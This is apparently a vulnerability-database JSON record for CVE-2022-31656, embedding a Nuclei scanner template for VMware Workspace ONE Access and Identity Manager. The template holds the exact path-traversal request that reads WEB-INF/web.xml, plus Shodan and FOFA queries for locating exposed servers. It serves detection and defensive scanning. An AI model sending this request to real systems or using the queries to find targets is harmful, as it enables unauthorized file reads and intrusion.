{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-31656/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-31656/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-31656/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-31656/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-31656/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-31656"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-31656"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-31656.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-31656\n\ninfo:\n  name: VMware - Local File Inclusion\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n  impact: |\n    The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.\n  remediation: |\n    To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.\n  reference:\n    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\n    - https://www.vmware.com/security/advisories/VMSA-2022-0021.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-31656\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-31656\n    cwe-id: CWE-287\n    epss-score: 0.2294\n    epss-percentile: 0.97671\n    cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: vmware\n    product: identity_manager\n    shodan-query: http.favicon.hash:-1250474341\n    fofa-query:\n      - icon_hash=-1250474341\n      - app=\"vmware-workspace-one-access\" || app=\"vmware-identity-manager\" || app=\"vmware-vrealize\"\n  tags: cve2022,cve,vmware,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<web-app\"\n          - \"<servlet-name>\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100de61f638eb39da9034672f915286b796c3a97572a3f46f2b16e870b51b77ecc5022100c4b5032aa2664863b62c5b5b6529784b7fb579572de1d75690f26ad31848f15e:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-31656"
}